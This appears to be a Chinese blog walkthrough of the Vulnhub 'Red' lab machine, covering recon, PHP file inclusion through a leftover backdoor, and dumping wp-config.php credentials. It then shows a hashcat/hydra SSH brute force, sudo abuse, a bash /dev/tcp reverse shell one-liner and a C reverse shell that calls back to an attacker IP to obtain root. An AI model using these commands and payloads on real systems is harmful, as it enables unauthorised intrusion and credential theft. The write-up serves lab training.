Red靶机笔记
概述
这台靶机主要练习了文件包含漏洞的利用过程,以及hashcat利用规则生成字典来爆破ssh,利用进程监听修改root自执行程序来拿到root权限的shell
靶机地址:https://www.vulnhub.com/entry/red-1,753/
一、nmap扫描
1、端口扫描
sudo nmap -sT --min-rate 10000 -p- -o ports 192.168.52.5
Nmap scan report for 192.168.52.5
Host is up (0.00086s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
看到只开放了22,80两个端口
2、版本探测
sudo nmap -sT -sV -sC -p22,80 -O -o details 192.168.52.5
Nmap scan report for 192.168.52.5
Host is up (0.00043s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 8d5365835252c4127249be335dd1e71c (RSA)
| 256 06610a49864364cab00c0f09177b33ba (ECDSA)
|_ 256 9b8d90472ac1dc11287d57e08a23b469 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.8.1
|_http-title: Hacked By Red – Your site has been Hacked! You\xE2\x80\x99ll neve...
MAC Address: 00:0C:29:07:4F:18 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3、漏洞探测
sudo nmap --script=vuln -p80,22 -o vuln 192.168.52.5
Nmap scan report for 192.168.52.5
Host is up (0.00051s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.52.5
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.52.5:80/
| Form id: wp-block-search__input-1
|_ Form action: http://redrocks.win/
| http-enum:
| /wp-login.php: Possible admin folder
| /wp-json: Possible admin folder
| /robots.txt: Robots file
| /readme.html: Wordpress version: 2
| /: WordPress version: 5.8.1
| /feed/: Wordpress version: 5.8.1
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
|_ /0/: Potentially interesting folder
| http-wordpress-users:
| Username found: administrator
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
通过扫描,我们发现了这个网站大概率是一个wordpress的网站,而且版本可能是5.8.1
二、web渗透
打开网站看看
看到有hacked by red,这是早期黑客拿下网站后,往往会留下的字样。说明这个网站已经被入侵了。
而在首页的底部,我们也确实看到了Proudly powered by WordPress. 说明这就是一个wordpress的网站
我们点击首页中的超链接会跳转到一个redrocks.win的域名
编辑/etc/hosts文件,添加域名
sudo sed -i '$a 192.168.52.5 redrocks.win' /etc/hosts
看到插入成功
先用wpscan扫描一下wordpress是否有漏洞
wpscan --url http://redrocks.win
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://redrocks.win/ [192.168.52.5]
[+] Started: Fri Jan 10 08:53:09 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://redrocks.win/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://redrocks.win/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://redrocks.win/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://redrocks.win/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
| Found By: Rss Generator (Passive Detection)
| - http://redrocks.win/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| - http://redrocks.win/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://redrocks.win/wp-content/themes/twentytwentyone/
| Last Updated: 2024-11-13T00:00:00.000Z
| Readme: http://redrocks.win/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 2.4
| Style URL: http://redrocks.win/wp-content/themes/twentytwentyone/style.css?ver=1.4
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://redrocks.win/wp-content/themes/twentytwentyone/style.css?ver=1.4, Match: 'Version: 1.4'
看到并没有扫描出来有用的漏洞。
我们在查看源代码信息是找到了注释
他说让我们向Mr.Miessler寻求帮助,google搜索一下这个人
看到一个字典,我们用这个字典做目录扫描
这个字典里有一个后门名称的模糊测试字典CommonBackdoors-PHP.fuzz.txt
为什么会是它,因为我们知道这是一个wordpress网站,也就是说,他是一个php的,而网站又多次提到它已经被入侵了。所以要找之前的前辈留下的后门。
sudo gobuster dir -u http://redrocks.win/ -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://redrocks.win/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/NetworkFileManagerPHP.php (Status: 500) [Size: 0]
Progress: 422 / 423 (99.76%)
===============================================================
Finished
===============================================================
看到了一个NetworkFileManagerPHP.php的文件,很有可能就是前辈留下的后门。
看到状态码是500,我们fuzz一下参数
用到了fuzz param 的字典:https://raw.githubusercontent.com/whiteknight7/wordlist/refs/heads/main/fuzz-lfi-params-list.txt
ffuf -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=id' -w /usr/share/seclists/Fuzzing/fuzz-lfi-params-list.txt -X GET -ac -t 10
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=id
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/fuzz-lfi-params-list.txt
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 10
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 1, Words: 1, Lines: 2, Duration: 10ms]
* FUZZ: key
看到参数是key,但是好像不是命令执行的参数,试一下看能读取文件吗?
http://redrocks.win/NetworkFileManagerPHP.php?key=/etc/passwd
这应该是一个文件包含漏洞,利用伪协议看一下这个文件的代码
http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=NetworkFileManagerPHP.php
PD9waHAKICAgJGZpbGUgPSAkX0dFVFsna2V5J107CiAgIGlmKGlzc2V0KCRmaWxlKSkKICAgewogICAgICAgaW5jbHVkZSgiJGZpbGUiKTsKICAgfQogICBlbHNlCiAgIHsKICAgICAgIGluY2x1ZGUoIk5ldHdvcmtGaWxlTWFuYWdlclBIUC5waHAiKTsKICAgfQogICAvKiBWR2hoZENCd1lYTnpkMjl5WkNCaGJHOXVaU0IzYjI0bmRDQm9aV3h3SUhsdmRTRWdTR0Z6YUdOaGRDQnpZWGx6SUhKMWJHVnpJR0Z5WlNCeWRXeGxjdz09ICovCj8+Cgo=
echo 'PD9waHAKICAgJGZpbGUgPSAkX0dFVFsna2V5J107CiAgIGlmKGlzc2V0KCRmaWxlKSkKICAgewogICAgICAgaW5jbHVkZSgiJGZpbGUiKTsKICAgfQogICBlbHNlCiAgIHsKICAgICAgIGluY2x1ZGUoIk5ldHdvcmtGaWxlTWFuYWdlclBIUC5waHAiKTsKICAgfQogICAvKiBWR2hoZENCd1lYTnpkMjl5WkNCaGJHOXVaU0IzYjI0bmRDQm9aV3h3SUhsdmRTRWdTR0Z6YUdOaGRDQnpZWGx6SUhKMWJHVnpJR0Z5WlNCeWRXeGxjdz09ICovCj8+Cgo=' | base64 -d
<?php
$file = $_GET['key'];
if(isset($file))
{
include("$file");
}
else
{
include("NetworkFileManagerPHP.php");
}
/* VGhhdCBwYXNzd29yZCBhbG9uZSB3b24ndCBoZWxwIHlvdSEgSGFzaGNhdCBzYXlzIHJ1bGVzIGFyZSBydWxlcw== */
?>
可以看到源码中有一个很像base64的注释字符串
echo 'VGhhdCBwYXNzd29yZCBhbG9uZSB3b24ndCBoZWxwIHlvdSEgSGFzaGNhdCBzYXlzIHJ1bGVzIGFyZSBydWxlcw==' | base64 -d
That password alone won't help you! Hashcat says rules are rules
看到他说密码帮助不了我,要用hashcat的规则破解
三、获得立足点
读取配置文件
http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=wp-config.php
echo 'PD9waHANCi8qKg0KICogVGhlIGJhc2UgY29uZmlndXJhdGlvbiBmb3IgV29yZFByZXNzDQogKg0KICogVGhlIHdwLWNvbmZpZy5waHAgY3JlYXRpb24gc2NyaXB0IHVzZXMgdGhpcyBmaWxlIGR1cmluZyB0aGUgaW5zdGFsbGF0aW9uLg0KICogWW91IGRvbid0IGhhdmUgdG8gdXNlIHRoZSB3ZWIgc2l0ZSwgeW91IGNhbiBjb3B5IHRoaXMgZmlsZSB0byAid3AtY29uZmlnLnBocCINCiAqIGFuZCBmaWxsIGluIHRoZSB2YWx1ZXMuDQogKg0KICogVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBmb2xsb3dpbmcgY29uZmlndXJhdGlvbnM6DQogKg0KICogKiBNeVNRTCBzZXR0aW5ncw0KICogKiBTZWNyZXQga2V5cw0KICogKiBEYXRhYmFzZSB0YWJsZSBwcmVmaXgNCiAqICogQUJTUEFUSA0KICoNCiAqIEBsaW5rIGh0dHBzOi8vd29yZHByZXNzLm9yZy9zdXBwb3J0L2FydGljbGUvZWRpdGluZy13cC1jb25maWctcGhwLw0KICoNCiAqIEBwYWNrYWdlIFdvcmRQcmVzcw0KICovDQovLyAqKiBNeVNRTCBzZXR0aW5ncyAtIFlvdSBjYW4gZ2V0IHRoaXMgaW5mbyBmcm9tIHlvdXIgd2ViIGhvc3QgKiogLy8NCi8qKiBUaGUgbmFtZSBvZiB0aGUgZGF0YWJhc2UgZm9yIFdvcmRQcmVzcyAqLw0KZGVmaW5lKCAnREJfTkFNRScsICd3b3JkcHJlc3MnICk7DQoNCi8qKiBNeVNRTCBkYXRhYmFzZSB1c2VybmFtZSAqLw0KZGVmaW5lKCAnREJfVVNFUicsICdqb2huJyApOw0KDQovKiogTXlTUUwgZGF0YWJhc2UgcGFzc3dvcmQgKi8NCmRlZmluZSggJ0RCX1BBU1NXT1JEJywgJ1Izdl9tNGx3aDNyM19rMW5HISEnICk7DQoNCi8qKiBNeVNRTCBob3N0bmFtZSAqLw0KZGVmaW5lKCAnREJfSE9TVCcsICdsb2NhbGhvc3QnICk7DQoNCi8qKiBEYXRhYmFzZSBDaGFyc2V0IHRvIHVzZSBpbiBjcmVhdGluZyBkYXRhYmFzZSB0YWJsZXMuICovDQpkZWZpbmUoICdEQl9DSEFSU0VUJywgJ3V0ZjgnICk7DQoNCi8qKiBUaGUgRGF0YWJhc2UgQ29sbGF0ZSB0eXBlLiBEb24ndCBjaGFuZ2UgdGhpcyBpZiBpbiBkb3VidC4gKi8NCmRlZmluZSggJ0RCX0NPTExBVEUnLCAnJyApOw0KDQpkZWZpbmUoJ0ZTX01FVEhPRCcsICdkaXJlY3QnKTsNCg0KZGVmaW5lKCdXUF9TSVRFVVJMJywgJ2h0dHA6Ly9yZWRyb2Nrcy53aW4nKTsNCmRlZmluZSgnV1BfSE9NRScsICdodHRwOi8vcmVkcm9ja3Mud2luJyk7DQoNCi8qKiNAKw0KICogQXV0aGVudGljYXRpb24gdW5pcXVlIGtleXMgYW5kIHNhbHRzLg0KICoNCiAqIENoYW5nZSB0aGVzZSB0byBkaWZmZXJlbnQgdW5pcXVlIHBocmFzZXMhIFlvdSBjYW4gZ2VuZXJhdGUgdGhlc2UgdXNpbmcNCiAqIHRoZSB7QGxpbmsgaHR0cHM6Ly9hcGkud29yZHByZXNzLm9yZy9zZWNyZXQta2V5LzEuMS9zYWx0LyBXb3JkUHJlc3Mub3JnIHNlY3JldC1rZXkgc2VydmljZX0uDQogKg0KICogWW91IGNhbiBjaGFuZ2UgdGhlc2UgYXQgYW55IHBvaW50IGluIHRpbWUgdG8gaW52YWxpZGF0ZSBhbGwgZXhpc3RpbmcgY29va2llcy4NCiAqIFRoaXMgd2lsbCBmb3JjZSBhbGwgdXNlcnMgdG8gaGF2ZSB0byBsb2cgaW4gYWdhaW4uDQogKg0KICogQHNpbmNlIDIuNi4wDQogKi8NCmRlZmluZSgnQVVUSF9LRVknLCAgICAgICAgICcydXVCdmM4U081ez5Vd1E8XjVWNVtVSEJ3JU59LUJ3V3F3fD48KkhmQndKKCAkJiUsKFpiZy9qd0ZrUkhmfnZ8Jyk7DQpkZWZpbmUoJ1NFQ1VSRV9BVVRIX0tFWScsICAnYWh9PElgNTJHTDZDXkB' | base64 -d
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'john' );
/** MySQL database password */
define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
define('FS_METHOD', 'direct');
define('WP_SITEURL', 'http://redrocks.win');
define('WP_HOME', 'http://redrocks.win');
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '2uuBvc8SO5{>UwQ<^5V5[UHBw%N}-BwWqw|><*HfBwJ( $&%,(Zbg/jwFkRHf~v|');
define('SECURE_AUTH_KEY', 'ah}<I`52GL6C^@base64: 无效的输入
看到一组凭证john:R3v_m4lwh3r3_k1nG!!,上边文件跟我们提示了,这个密码应该和ssh用户的密码有所区别。
要用hashcat的rule重新生成一个密码字典,因为看到字符串好多都是base64加密的,我们猜测可以使用base64的规则来生成字典
echo "R3v_m4lwh3r3_k1nG\!\!" > pass
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout pass > passlist
用密码爆破工具hydra爆破密码
看到凭证john:R3v_m4lwh3r3_k1nG!!00
成功获得立足点
四、提权
获得立足点后发现这是一个受限的shell,过一会就把我t出shell了。重新用hydra破解,才能获取新的密码,再次进入
sudo -l
Matching Defaults entries for john on red:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on red:
(ippsec) NOPASSWD: /usr/bin/time
利用time命令切换到
sudo -u ippsec /usr/bin/time /bin/bash
但是切换到了ippsec还是shell受限,我们反弹一个shell
写一个反弹shell脚本
echo 'bash -c "bash -i >& /dev/tcp/192.168.52.3/4444 0>&1"' > revshell
刚上传到靶机上,就断开了。没事,我们重新再登陆一次
这里要维持shell不被t掉,就要和t掉ssh的程序竞争。你可以执行运行时间较长的命令,直到t掉shell的程序运行完,我们就获得了可以维持的shell。
看到左下角成功反弹
当然你可以使用下面的监听工具来绕过,因为它的执行时间足够长。
发现登陆到shell的时候,会时不时冒出一些话来,应该是有类似定时任务的进程,可以使用pspy64s监听进程
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
监听到一些后门文件的运行
我们对wordpress目录下的文件是有权限操作的,我们把supersecretfileuc.c文件替换为反弹shell的c文件
这台机器的vi和cat有问题,我们先在kali上写好文件
从https://www.revshells.com/上生成反弹shell文件
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 9001;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("192.168.52.3");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
return 0;
}
wget http://192.168.52.3/supersecretfileuc.c
成功替换
删除rev,这是c文件的编译程序,等待shell弹回
成功反弹回root权限的shell
Happy Hacking~
标签:__,http,win,Vulnhub,wp,靶机,php,redrocks,Red From: https://www.cnblogs.com/LINGX5/p/18665572